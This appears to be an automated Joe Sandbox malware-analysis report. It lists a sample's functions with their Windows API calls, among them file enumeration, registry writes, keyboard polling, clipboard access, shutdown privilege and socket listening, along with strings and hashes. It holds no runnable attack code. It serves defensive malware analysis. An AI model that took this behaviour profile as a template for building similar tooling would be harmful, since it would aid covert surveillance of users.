FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0046EFB6
_wcscmp.LIBCMT ref: 0046EFCB
_wcscmp.LIBCMT ref: 0046EFE2
GetFileAttributesW.KERNEL32(?), ref: 0046EFF4
SetFileAttributesW.KERNEL32(?,?), ref: 0046F00E
FindNextFileW.KERNEL32(00000000,?), ref: 0046F026
FindClose.KERNEL32(00000000), ref: 0046F031
FindFirstFileW.KERNEL32(*.*,?), ref: 0046F04D
_wcscmp.LIBCMT ref: 0046F074
_wcscmp.LIBCMT ref: 0046F08B
SetCurrentDirectoryW.KERNEL32(?), ref: 0046F09D
SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F0BB
FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F0C5
FindClose.KERNEL32(00000000), ref: 0046F0D2
FindClose.KERNEL32(00000000), ref: 0046F0E4

Strings

*.*, xrefs: 0046F048

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
Instruction ID: e0d4b25dfa95f140917fd6c0b332215adfde449a0ea65fd213ed944f24ec6cf3
Opcode Fuzzy Hash: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
Instruction Fuzzy Hash: EC31E7325011187ADF14EFA4EC48AEF77AC9F44360F10057BE844D2191EB79DA88CB6E

Function 00480857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00480953
RegCreateKeyExW.ADVAPI32(?,?,00000000,0048F910,00000000,?,00000000,?,?), ref: 004809C1
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00480A09
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00480A92
RegCloseKey.ADVAPI32(?), ref: 00480DB2
RegCloseKey.ADVAPI32(00000000), ref: 00480DBF

Strings

REG_EXPAND_SZ, xrefs: 00480A2F
REG_BINARY, xrefs: 00480D4D
REG_MULTI_SZ, xrefs: 00480B7A
REG_SZ, xrefs: 00480AD0
REG_DWORD, xrefs: 00480C83
REG_QWORD, xrefs: 00480D00

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 6981eda69d7c4072daa770cbfc60c76714524ffd3feea76163fc9223bc30861a
Instruction ID: 75f0257f13d9dd97868b06569ad7b6a65722ecc89240c550ead6eefe92fcdcfb
Opcode Fuzzy Hash: 6981eda69d7c4072daa770cbfc60c76714524ffd3feea76163fc9223bc30861a
Instruction Fuzzy Hash: 3E023A756106119FCB54EF15D841E2AB7E5FF89314F04886EF8899B3A2CB38EC45CB89

Function 004166E1 Relevance: 25.9, Strings: 20, Instructions: 889COMMON

Download Yara Rule

Strings

3cA, xrefs: 004168FF
pGJ, xrefs: 00416751
0EJ, xrefs: 0041673D
NO_START_OPT), xrefs: 0045114F
LIMIT_MATCH=, xrefs: 00451170
LF), xrefs: 004512A4
NO_AUTO_POSSESS), xrefs: 0045112E
LIMIT_RECURSION=, xrefs: 004511FC
ANYCRLF), xrefs: 004512FB
UCP), xrefs: 0045110D
ANY), xrefs: 004512DE
UTF16), xrefs: 004510CF
0FJ, xrefs: 00416747
CR), xrefs: 00451287
_A, xrefs: 00451465, 0045150C, 004515B4
0DJ, xrefs: 00416733
UTF), xrefs: 004510FA
BSR_ANYCRLF), xrefs: 0045131E
BSR_UNICODE), xrefs: 00451338
CRLF), xrefs: 004512C1

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID:
String ID: 0DJ$0EJ$0FJ$3cA$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGJ$_A
API String ID: 0-559809668
Opcode ID: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
Instruction ID: 6096d484c95c14ad7aa8192e29e4e3e8d71b99b3f093478e4f466f6acf52d5c9
Opcode Fuzzy Hash: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
Instruction Fuzzy Hash: 13727E75E002199BDB14CF59C8807EEB7B5FF48311F15816BE809EB291E7389E85CB98

Function 0046F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0046F113
_wcscmp.LIBCMT ref: 0046F128
_wcscmp.LIBCMT ref: 0046F13F

Part of subcall function 00464385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004643A0

FindNextFileW.KERNEL32(00000000,?), ref: 0046F16E
FindClose.KERNEL32(00000000), ref: 0046F179
FindFirstFileW.KERNEL32(*.*,?), ref: 0046F195
_wcscmp.LIBCMT ref: 0046F1BC
_wcscmp.LIBCMT ref: 0046F1D3
SetCurrentDirectoryW.KERNEL32(?), ref: 0046F1E5
SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F203
FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F20D
FindClose.KERNEL32(00000000), ref: 0046F21A
FindClose.KERNEL32(00000000), ref: 0046F22C

Strings

*.*, xrefs: 0046F190

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 5e4c1ca136502ca1550e0c7352cbc5842e7fcfe98f56b9ff86b85f6952a77760
Instruction ID: 359f8111c83e04d014ff149dee767818393646aa3285bf91305061d844a33625
Opcode Fuzzy Hash: 5e4c1ca136502ca1550e0c7352cbc5842e7fcfe98f56b9ff86b85f6952a77760
Instruction Fuzzy Hash: 1031C3365001196ADF10AEA4FC54AEE77AC9F45360F2005BBE844A2190EA39DE89CA6D

Function 0046A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0046A20F
__swprintf.LIBCMT ref: 0046A231
CreateDirectoryW.KERNEL32(?,00000000), ref: 0046A26E
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0046A293
_memset.LIBCMT ref: 0046A2B2
_wcsncpy.LIBCMT ref: 0046A2EE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0046A323
CloseHandle.KERNEL32(00000000), ref: 0046A32E
RemoveDirectoryW.KERNEL32(?), ref: 0046A337
CloseHandle.KERNEL32(00000000), ref: 0046A341

Strings

\??\%s, xrefs: 0046A22B
:, xrefs: 0046A252
\, xrefs: 0046A247

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
Instruction ID: f10b276181cf8096dd79107661fba1eb4aa855f6953dd7c4d63ebe7d830bec3b
Opcode Fuzzy Hash: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
Instruction Fuzzy Hash: 1E31C571500119ABDB20DFA0DC49FEF77BCEF88704F1044BAF908E2260E77496948B29

Function 0046001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00460097
SetKeyboardState.USER32(?), ref: 00460102
GetAsyncKeyState.USER32(000000A0), ref: 00460122
GetKeyState.USER32(000000A0), ref: 00460139
GetAsyncKeyState.USER32(000000A1), ref: 00460168
GetKeyState.USER32(000000A1), ref: 00460179
GetAsyncKeyState.USER32(00000011), ref: 004601A5
GetKeyState.USER32(00000011), ref: 004601B3
GetAsyncKeyState.USER32(00000012), ref: 004601DC
GetKeyState.USER32(00000012), ref: 004601EA
GetAsyncKeyState.USER32(0000005B), ref: 00460213
GetKeyState.USER32(0000005B), ref: 00460221

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
Instruction ID: c6705f0abb03acfe1c66d12a8beead0d319d3067caf51b1e954f1b2a293a3a50
Opcode Fuzzy Hash: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
Instruction Fuzzy Hash: 7F51BC2090478829FB35D7A098547EBBFB49F12380F08459F99C2566C3FA5C9A8CC75B

Function 004803DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004804AC

Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0048054B
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004805E3
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00480822
RegCloseKey.ADVAPI32(00000000), ref: 0048082F

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: b5d6b35ea8ebe0d010c7e55f3e15d862d1f454c99d69da38caedf5bf36670647
Instruction ID: efbac3d2c4afa975f371ae5d5fee671ec22ce1fa5a9a6cb729be810612663562
Opcode Fuzzy Hash: b5d6b35ea8ebe0d010c7e55f3e15d862d1f454c99d69da38caedf5bf36670647
Instruction Fuzzy Hash: A5E16E71614200AFCB54EF25C891D2FBBE4EF89314B04896EF84ADB3A2D634ED45CB56

Function 00474164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0047418B
EmptyClipboard.USER32 ref: 00474191
GlobalAlloc.KERNEL32(00000002,?), ref: 004741A6
CloseClipboard.USER32 ref: 00474245

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
Instruction ID: 6a8dd1f95291b63ae5b16d2a5a0d869dcb5166510358231783c1e180ef80644f
Opcode Fuzzy Hash: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
Instruction Fuzzy Hash: CE2191352002109FDB00AF54EC09B6E7BA8EF44751F10847AF945E72A2EB38AC05CB5D

Function 0046F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0046F440
Sleep.KERNEL32(0000000A), ref: 0046F470
_wcscmp.LIBCMT ref: 0046F484
_wcscmp.LIBCMT ref: 0046F49F
FindNextFileW.KERNEL32(?,?), ref: 0046F53D
FindClose.KERNEL32(00000000), ref: 0046F553

Strings

*.*, xrefs: 0046F425

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: 92a288f11230d480a522b0c0f936cc6b9b9cd0aeee01b41ae93ea83b3e82efad
Instruction ID: 52678bcd3f78e7a2dee1500e624958e336d76892905c76040bb4fc6126c74c58
Opcode Fuzzy Hash: 92a288f11230d480a522b0c0f936cc6b9b9cd0aeee01b41ae93ea83b3e82efad
Instruction Fuzzy Hash: D0418D71904219AFCF10EF64DC45AEFBBB4FF04314F50446BE855A2291EB38AE88CB59

Function 00413030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON

Download Yara Rule

Strings

3cA, xrefs: 00413225
_A, xrefs: 00413322

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: __itow__swprintf
String ID: 3cA$_A
API String ID: 674341424-3480954128
Opcode ID: b89c626c4fab00b03cda0a74c0410a572875634de8e20fba3812235e50cf766d
Instruction ID: 703a96bf305cb9905ff3d3c25826e0fcfbd93ba8a00a4d78e9854e8314894fca
Opcode Fuzzy Hash: b89c626c4fab00b03cda0a74c0410a572875634de8e20fba3812235e50cf766d
Instruction Fuzzy Hash: AB229B716083009FD724DF14C881BABB7E4AF85314F11492EF89A97392DB78E945CB9B

Function 004651BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865

ExitWindowsEx.USER32(?,00000000), ref: 004651F9

Strings

@, xrefs: 004651EC
SeShutdownPrivilege, xrefs: 004651C9
, xrefs: 004651E7

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 54329107cda8fc21248f4887d0b4108f88f23b4200919f0ee4a3738f6efa1ba1
Instruction ID: a9b7a44e2451b6884de2a96c8f52f71cfd0e95415fa4985b61f57267d5601e10
Opcode Fuzzy Hash: 54329107cda8fc21248f4887d0b4108f88f23b4200919f0ee4a3738f6efa1ba1
Instruction Fuzzy Hash: D201F7317916116BF7286668ACAAFBB7358DB05345F2008BBFD03E21D2FD591C058A9F

Function 00476283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006), ref: 004762DC
WSAGetLastError.WSOCK32(00000000), ref: 004762EB
bind.WSOCK32(00000000,?,00000010), ref: 00476307
listen.WSOCK32(00000000,00000005), ref: 00476316
WSAGetLastError.WSOCK32(00000000), ref: 00476330
closesocket.WSOCK32(00000000), ref: 00476344

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 146cf2852e84b98676a1cb8b53444c853230e893978cbd9bf0c490d800ba36be
Instruction ID: 9cc0b371228dcaf8913226d6fe42490e105b9b769aefcc5547ebbaeef9b3f94b
Opcode Fuzzy Hash: 146cf2852e84b98676a1cb8b53444c853230e893978cbd9bf0c490d800ba36be
Instruction Fuzzy Hash: 6521F2312006049FCB10FF64C845A6EB7BAEF44324F15856EEC1AA73D2C734AC05CB59

Function 00415520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01

_memmove.LIBCMT ref: 00450258
_memmove.LIBCMT ref: 0045036D
_memmove.LIBCMT ref: 00450414

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: dce42870d7098ac48325943f50e90a35d891743806a5d1066521839b2bd27497
Instruction ID: ce31bd404333394545349dab4fd8ad238969c684e33d592a62d2001407cdf1f6
Opcode Fuzzy Hash: dce42870d7098ac48325943f50e90a35d891743806a5d1066521839b2bd27497
Instruction Fuzzy Hash: 3202E270A00205DBCF04DF65D9816AEBBF5EF84304F54806EE80ADB392EB39D955CB99

Function 00401287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623

DefDlgProcW.USER32(?,?,?,?,?), ref: 004019FA
GetSysColor.USER32(0000000F), ref: 00401A4E
SetBkColor.GDI32(?,00000000), ref: 00401A61

Part of subcall function 00401290: DefDlgProcW.USER32(?,00000020,?), ref: 004012D8

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 8db6b4c7db5f97784a80f15b687025ec058e6c3025e7102d3aafc5b58ad8fc88
Instruction ID: d041ec2a837aeb515327988813bafb0785b4d0a615f46c6b1421ede386c2745f
